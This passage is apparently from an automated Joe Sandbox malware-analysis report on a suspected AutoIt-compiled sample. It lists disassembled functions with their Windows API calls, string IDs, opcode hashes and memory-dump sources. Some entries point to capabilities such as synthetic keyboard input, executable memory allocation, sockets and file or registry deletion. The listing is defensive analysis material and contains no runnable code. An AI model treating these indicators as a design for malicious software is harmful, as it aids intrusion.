                                            • API String ID: 2620147621-3945284152
                                            • Opcode ID: 43273f973ccc00973a977b65c0e7271bcd42cef909f5b04910f0f0fc9ea59cd2
                                            • Instruction ID: ceae39235e464b269c52a7254c92ee9b379247d963e45442b94556fc2e8f1e2d
                                            • Opcode Fuzzy Hash: 43273f973ccc00973a977b65c0e7271bcd42cef909f5b04910f0f0fc9ea59cd2
                                            • Instruction Fuzzy Hash: 7B5179B16083519FDB24CF28E451B2BBBE5BF85304F04592DE889A7361DB35E941CF82
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memset$_memmove
                                            • String ID: ERCP
                                            • API String ID: 2532777613-1384759551
                                            • Opcode ID: a0b3b95d38bf8cea5fcfa7880506d2715b2028a5fc9bfe102d2ffdce76e05268
                                            • Instruction ID: af6e78d99031c1f02bf24c4d49f1b6a39ea63614433b1791896d278e24e15009
                                            • Opcode Fuzzy Hash: a0b3b95d38bf8cea5fcfa7880506d2715b2028a5fc9bfe102d2ffdce76e05268
                                            • Instruction Fuzzy Hash: A951F3719003198BCB24CF64D881BAABBF4FF44318F20566EE59AEB241E7719680CB80
                                            APIs
                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E976D0
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E976E4
                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E97708
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window
                                            • String ID: SysMonthCal32
                                            • API String ID: 2326795674-1439706946
                                            • Opcode ID: 4eac1b11039f3ddb366229d0e5feb31e0244fbab7582679dedd3975f34619dfa
                                            • Instruction ID: 41ace0952ae5c06fb88d0dbdaa7130a3a395f2edc973d01f3889d000b7bd4d08
                                            • Opcode Fuzzy Hash: 4eac1b11039f3ddb366229d0e5feb31e0244fbab7582679dedd3975f34619dfa
                                            • Instruction Fuzzy Hash: FB21F132510218BFDF11CFA4CC42FEA3BA9EF48714F101215FE55BB1D1D6B1A8548BA0
                                            APIs
                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E96FAA
                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E96FBA
                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E96FDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$MoveWindow
                                            • String ID: Listbox
                                            • API String ID: 3315199576-2633736733
                                            • Opcode ID: c41371c8cfe478b2ecf04cb03cd788e35d2bd764b947ee33ff2526fea127521e
                                            • Instruction ID: 4908ca1784eb1ccfed7263cdefe4be3748f70c53ad7a2f31bf5f139d29e7822c
                                            • Opcode Fuzzy Hash: c41371c8cfe478b2ecf04cb03cd788e35d2bd764b947ee33ff2526fea127521e
                                            • Instruction Fuzzy Hash: 72219232710118BFDF118F54EC85FEB37AAEF89754F019126F914AB190C671AC518BA0
                                            APIs
                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E979E1
                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E979F6
                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E97A03
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: msctls_trackbar32
                                            • API String ID: 3850602802-1010561917
                                            • Opcode ID: 8736453e1b3afe166d79d3e34b2d7b75cc503dde3fbd7aee48cc99876cd12da8
                                            • Instruction ID: d3443b9d426e79b329169c4510f6dbe0f62821039418b698954453dfe88b12a7
                                            • Opcode Fuzzy Hash: 8736453e1b3afe166d79d3e34b2d7b75cc503dde3fbd7aee48cc99876cd12da8
                                            • Instruction Fuzzy Hash: D911E372254208BFEF249F65CC05FEB37A9EF89768F021519FA41B6090D2729851CB60
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00E14C2E), ref: 00E14CA3
                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E14CB5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                            • API String ID: 2574300362-192647395
                                            • Opcode ID: 4abfe85fee0daf9fb1454f6a36afc20ce1418dd16e2657cc7d1019959f957fd7
                                            • Instruction ID: 34934d0f5a2ae671e8c8d33e509a130e0d1e647b7d86e3b65ba76251747f3a7d
                                            • Opcode Fuzzy Hash: 4abfe85fee0daf9fb1454f6a36afc20ce1418dd16e2657cc7d1019959f957fd7
                                            • Instruction Fuzzy Hash: D6D01270511723DFDB205F32D918646B6D5AF05795B25983BD885F6290E670D4C0CA90
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00E14CE1,?), ref: 00E14DA2
                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E14DB4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                            • API String ID: 2574300362-1355242751
                                            • Opcode ID: df53adef903acf3793f38b73d4a0eb5741b0d9a0e9031f592dc3eb04d8ba8c7a
                                            • Instruction ID: d45cfad63f097df15c075a1ccd1fb1994a6b82d4cdf5ba8a1859a36841c0721e
                                            • Opcode Fuzzy Hash: df53adef903acf3793f38b73d4a0eb5741b0d9a0e9031f592dc3eb04d8ba8c7a
                                            • Instruction Fuzzy Hash: BCD01771650713DFDB209F32E809A8676E4AF06359B11983FD8C6F62A0E770D8C0CA91
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00E14D2E,?,00E14F4F,?,00ED62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E14D6F
                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E14D81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                            • API String ID: 2574300362-3689287502
                                            • Opcode ID: 913bd5e38cf27f4a4dd43e57ccb9b7dc4da16ac7738a1cd50a05b9950dbac955
                                            • Instruction ID: 5970c2307b0a442ad31b158886e1b6c72662c04c5da57be46ba90619c9de660c
                                            • Opcode Fuzzy Hash: 913bd5e38cf27f4a4dd43e57ccb9b7dc4da16ac7738a1cd50a05b9950dbac955
                                            • Instruction Fuzzy Hash: 92D01770610713DFDB209F32E80965676E8AF15356B21983FD496F62A0E670D8C0CB91
                                            APIs
                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00E912C1), ref: 00E91080
                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E91092
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                            • API String ID: 2574300362-4033151799
                                            • Opcode ID: a8287536e76361b0ec48fb3a54fae34d9d1878fd53be8c76d53e55ed3c24d484
                                            • Instruction ID: 033cc55378c3008c447c87c2eb601db523549869fc2c6e9beb4647095a41fcd6
                                            • Opcode Fuzzy Hash: a8287536e76361b0ec48fb3a54fae34d9d1878fd53be8c76d53e55ed3c24d484
                                            • Instruction Fuzzy Hash: 79D0E230510713DFDB209B36E919A1A76E8AF05366B11986EE48AEA260E771C8C08A90
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E89009,?,00E9F910), ref: 00E89403
                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E89415
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetModuleHandleExW$kernel32.dll
                                            • API String ID: 2574300362-199464113
                                            • Opcode ID: 9cc949d1a7ee830c9d2f48fa96c519ae4b6b9765f9bc06d7413d9eeaa3d50246
                                            • Instruction ID: c14123f421b57d4b3032ba762fa333fb34a1a70ed4381303db03707284dddd10
                                            • Opcode Fuzzy Hash: 9cc949d1a7ee830c9d2f48fa96c519ae4b6b9765f9bc06d7413d9eeaa3d50246
                                            • Instruction Fuzzy Hash: 79D0C230900313CFC7206F32D94860272D4AF01345B14D83FD499F2551E670C480C750
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c91d63bd60a85bcad93d78b552c94af169a77a7a25ee1f4b9a398ee0356e5321
                                            • Instruction ID: 50e247844a1343143e77768004d2fed0b6fc52dd29a687c8891ddc9b0dfd710b
                                            • Opcode Fuzzy Hash: c91d63bd60a85bcad93d78b552c94af169a77a7a25ee1f4b9a398ee0356e5321
                                            • Instruction Fuzzy Hash: 59C1A274A04216EFCB14CFA4D884EAEBBF5FF48758B119599E885EB250D730ED81CB90
                                            APIs
                                            • CharLowerBuffW.USER32(?,?), ref: 00E8E3D2
                                            • CharLowerBuffW.USER32(?,?), ref: 00E8E415
                                              • Part of subcall function 00E8DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E8DAD9
                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E8E615
                                            • _memmove.LIBCMT ref: 00E8E628
                                            Similarity
                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                            • String ID:
                                            • API String ID: 3659485706-0
                                            • Opcode ID: 9422afe345f18b5d020c1de491eec0084c0dcb1570e253cfa8e1572271adf264
                                            • Instruction ID: 79bd3a39f7e712fd65835b95b05c098ee5a9edcdbc817f8a1048a07d9501ae70
                                            • Opcode Fuzzy Hash: 9422afe345f18b5d020c1de491eec0084c0dcb1570e253cfa8e1572271adf264
                                            • Instruction Fuzzy Hash: 6FC168716083018FC714EF28C49096ABBE5FF88718F14996EF89DAB351D731E946CB82
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 00E883D8
                                            • CoUninitialize.OLE32 ref: 00E883E3
                                              • Part of subcall function 00E6DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E6DAC5
                                            • VariantInit.OLEAUT32(?), ref: 00E883EE
                                            • VariantClear.OLEAUT32(?), ref: 00E886BF
                                            Similarity
                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                            • String ID:
                                            • API String ID: 780911581-0
                                            • Opcode ID: 343cef565403cd19e1b3b32513fbf4f65c81025da4607f5b485e883f53164fb1
                                            • Instruction ID: e13a1a021840c458cf4ea0ef42d1ecec6ce6305a8ff33a9e538f89cbd03756c2
                                            • Opcode Fuzzy Hash: 343cef565403cd19e1b3b32513fbf4f65c81025da4607f5b485e883f53164fb1
                                            • Instruction Fuzzy Hash: BFA148752047019FCB10EF14C991A6AB7E5BF88314F54A449F99EAB3A2DB30ED44CB82
                                            Similarity
                                            • API ID: Variant$AllocClearCopyInitString
                                            • String ID:
                                            • API String ID: 2808897238-0
                                            • Opcode ID: 05df49f6ecebe1310b69048b7e82edf6940a9765f6427340c89f702f75da836d
                                            • Instruction ID: 799d74b391d5ad6a0aec9bd678d2276532739509397dbd79c87bf986f86e2b76
                                            • Opcode Fuzzy Hash: 05df49f6ecebe1310b69048b7e82edf6940a9765f6427340c89f702f75da836d
                                            • Instruction Fuzzy Hash: 9451F9307943019ADB60AF65F495A6EB3E5AF48354F30B81FE5D6FB292DB309880DB11
                                            APIs
                                            • GetWindowRect.USER32(0104E5A0,?), ref: 00E99AD2
                                            • ScreenToClient.USER32(00000002,00000002), ref: 00E99B05
                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E99B72
                                            Similarity
                                            • API ID: Window$ClientMoveRectScreen
                                            • String ID:
                                            • API String ID: 3880355969-0
                                            • Opcode ID: fceebaec034a564a88bcf5bcafae4bb06d8c908549514e8ca5091ddf87dccccf
                                            • Instruction ID: 74a9808bd8f74468be7db007867ef75e96696007073c3f1f5ee9424b92d165a5
                                            • Opcode Fuzzy Hash: fceebaec034a564a88bcf5bcafae4bb06d8c908549514e8ca5091ddf87dccccf
                                            • Instruction Fuzzy Hash: BE514F34A00209EFCF14DF68E8809AE7BB5FF45324F10915EF815AB291E734AD81CB94
                                            APIs
                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00E86CE4
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86CF4
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E86D58
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86D64
                                            Similarity
                                            • API ID: ErrorLast$__itow__swprintfsocket
                                            • String ID:
                                            • API String ID: 2214342067-0
                                            • Opcode ID: 94bd534c27cef0815d925ec08dc93e2c0051d00708d69e60ea8c1795739662c2
                                            • Instruction ID: 95ca576ca09ac8190cfcde345fdbb8afd6309ede1bbef0af5e906fbb0c684457
                                            • Opcode Fuzzy Hash: 94bd534c27cef0815d925ec08dc93e2c0051d00708d69e60ea8c1795739662c2
                                            • Instruction Fuzzy Hash: 56419175740200AFEB20BF24DC96FBA77E5AB44B14F449019FA59BB2D3DA709D408791
                                            APIs
                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E9F910), ref: 00E867BA
                                            • _strlen.LIBCMT ref: 00E867EC
                                            Similarity
                                            • API ID: _strlen
                                            • String ID:
                                            • API String ID: 4218353326-0
                                            • Opcode ID: 1fb62fc8581f3c8f4aedc5b09afa68c7575e6d120842a2992ef694172d2a00f9
                                            • Instruction ID: 3465fa220f113809d1cb8cac81688eda49f7176d2566010aa9041920e4cab1dc
                                            • Opcode Fuzzy Hash: 1fb62fc8581f3c8f4aedc5b09afa68c7575e6d120842a2992ef694172d2a00f9
                                            • Instruction Fuzzy Hash: 3C416D31A00104AFCB18FBA4DDD5EEEB7E9AF44314F149165F81EBB292DA30AD44CB90
                                            APIs
                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E7BB09
                                            • GetLastError.KERNEL32(?,00000000), ref: 00E7BB2F
                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E7BB54
                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E7BB80
                                            Similarity
                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                            • String ID:
                                            • API String ID: 3321077145-0
                                            • Opcode ID: 547bd49483e3d31b367fea52f7d8d09f13bcb3a2daacaa17bceefa4f1bd88608
                                            • Instruction ID: 227375d131ec2522c17a92623bec6a0159a5e1dda3e9d71c154041749cb32e06
                                            • Opcode Fuzzy Hash: 547bd49483e3d31b367fea52f7d8d09f13bcb3a2daacaa17bceefa4f1bd88608
                                            • Instruction Fuzzy Hash: E9412239200610DFCB21EF15C594A9DBBE1AF89324B09D499FC4AAB362CB34FD41CB91
                                            APIs
                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E98B4D
                                            Similarity
                                            • API ID: InvalidateRect
                                            • String ID:
                                            • API String ID: 634782764-0
                                            • Opcode ID: 32f96358266607abd1e0f9cacda6eeb96a9aba1bacf744af6fc03de70d20c91b
                                            • Instruction ID: ce20e0569d9718114b36c7468f0a18b6ac4678b4f45ec21f3ad9de84e847fb70
                                            • Opcode Fuzzy Hash: 32f96358266607abd1e0f9cacda6eeb96a9aba1bacf744af6fc03de70d20c91b
                                            • Instruction Fuzzy Hash: 9B31B2B8600204BEEF249E18DE55FED37A5EB07314F286616FA55F72B1EE30AD409641
                                            APIs
                                            • ClientToScreen.USER32(?,?), ref: 00E9AE1A
                                            • GetWindowRect.USER32(?,?), ref: 00E9AE90
                                            • PtInRect.USER32(?,?,00E9C304), ref: 00E9AEA0
                                            • MessageBeep.USER32(00000000), ref: 00E9AF11
                                            Similarity
                                            • API ID: Rect$BeepClientMessageScreenWindow
                                            • String ID:
                                            • API String ID: 1352109105-0
                                            • Opcode ID: 2a37deeb60337b26ced983f7b7d64f210872ca3bab3cacaa9fc4f1857e81d967
                                            • Instruction ID: c3c674896d4cb6dc04cbd98e36c388262ec91ff3f75bbde321e30090e60382fe
                                            • Opcode Fuzzy Hash: 2a37deeb60337b26ced983f7b7d64f210872ca3bab3cacaa9fc4f1857e81d967
                                            • Instruction Fuzzy Hash: 84418A74600219DFCF15CF59D884AA9BBF5FF49340F2891BAE814EB261D730A885DB92
                                            APIs
                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E71037
                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E71053
                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E710B9
                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E7110B
                                            Similarity
                                            • API ID: KeyboardState$InputMessagePostSend
                                            • String ID:
                                            • API String ID: 432972143-0
                                            • Opcode ID: bc13505ea3a3672356b0e609e617859dc116ad9364931be5109a2a3d1f7e7037
                                            • Instruction ID: 0dc1a99f46249dc7738bc09dc1d91563d433e3ecef37bb69b0f64d6b914bb854
                                            • Opcode Fuzzy Hash: bc13505ea3a3672356b0e609e617859dc116ad9364931be5109a2a3d1f7e7037
                                            • Instruction Fuzzy Hash: 6A313730E40788AEFB308A6E8C05BF9BBA9AB45314F04D29AE598B21D1C3748DC49751
                                            APIs
                                            • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00E71176
                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E71192
                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E711F1
                                            • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00E71243
                                            Similarity
                                            • API ID: KeyboardState$InputMessagePostSend
                                            • String ID:
                                            • API String ID: 432972143-0
                                            • Opcode ID: ca1f53fd75ad485a16989fbff5fcccda167069ea44f837ff6109e57a216345b2
                                            • Instruction ID: 0ca821138b6ad88f9df60e417035bbf312037abbac5489ceb00885a85442c488
                                            • Opcode Fuzzy Hash: ca1f53fd75ad485a16989fbff5fcccda167069ea44f837ff6109e57a216345b2
                                            • Instruction Fuzzy Hash: 29316830941348AEEF308A6D8C04BFE7BAAAB49314F54E39BE588B61E1C3344D859751
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E4644B
                                            • __isleadbyte_l.LIBCMT ref: 00E46479
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E464A7
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E464DD
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: 697189b3fa3a7cf8cfe82841fd96917b45829cb40587fb937158f1b2dad944b4
                                            • Instruction ID: cf0b47dc4a65359ae135bdb8f32001e31b76eae233426885f8ecd303bbf8ba1f
                                            • Opcode Fuzzy Hash: 697189b3fa3a7cf8cfe82841fd96917b45829cb40587fb937158f1b2dad944b4
                                            • Instruction Fuzzy Hash: BF31EF31600246AFDF258F75E844BAA7BA9FF42314F155029F864A71A1EB31DC90DB92
                                            APIs
                                            • GetForegroundWindow.USER32 ref: 00E95189
                                              • Part of subcall function 00E7387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E73897
                                              • Part of subcall function 00E7387D: GetCurrentThreadId.KERNEL32 ref: 00E7389E
                                              • Part of subcall function 00E7387D: AttachThreadInput.USER32(00000000,?,00E752A7), ref: 00E738A5
                                            • GetCaretPos.USER32(?), ref: 00E9519A
                                            • ClientToScreen.USER32(00000000,?), ref: 00E951D5
                                            • GetForegroundWindow.USER32 ref: 00E951DB
                                            Similarity
                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                            • String ID:
                                            • API String ID: 2759813231-0
                                            • Opcode ID: 17acbace63c45463dd61e4de7e142684277b19044ba8c9abe7075e5b7007f8c1
                                            • Instruction ID: 4523ab87f1798d65919e8c4c5d38c9d29e4d0e996a0ec2b03e78c6a9c7f22936
                                            • Opcode Fuzzy Hash: 17acbace63c45463dd61e4de7e142684277b19044ba8c9abe7075e5b7007f8c1
                                            • Instruction Fuzzy Hash: F1313E72900108AFDB00EFB5C885AEFB7F9EF98300F10506AE415F7252EA759E45CBA0
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • GetCursorPos.USER32(?), ref: 00E9C7C2
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E4BBFB,?,?,?,?,?), ref: 00E9C7D7
                                            • GetCursorPos.USER32(?), ref: 00E9C824
                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E4BBFB,?,?,?), ref: 00E9C85E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                            • String ID:
                                            • API String ID: 2864067406-0
                                            • Opcode ID: cf4f193fe0a044646a43f2b0bd24c7050603a6d8eca0459bb05b6584a033a4f1
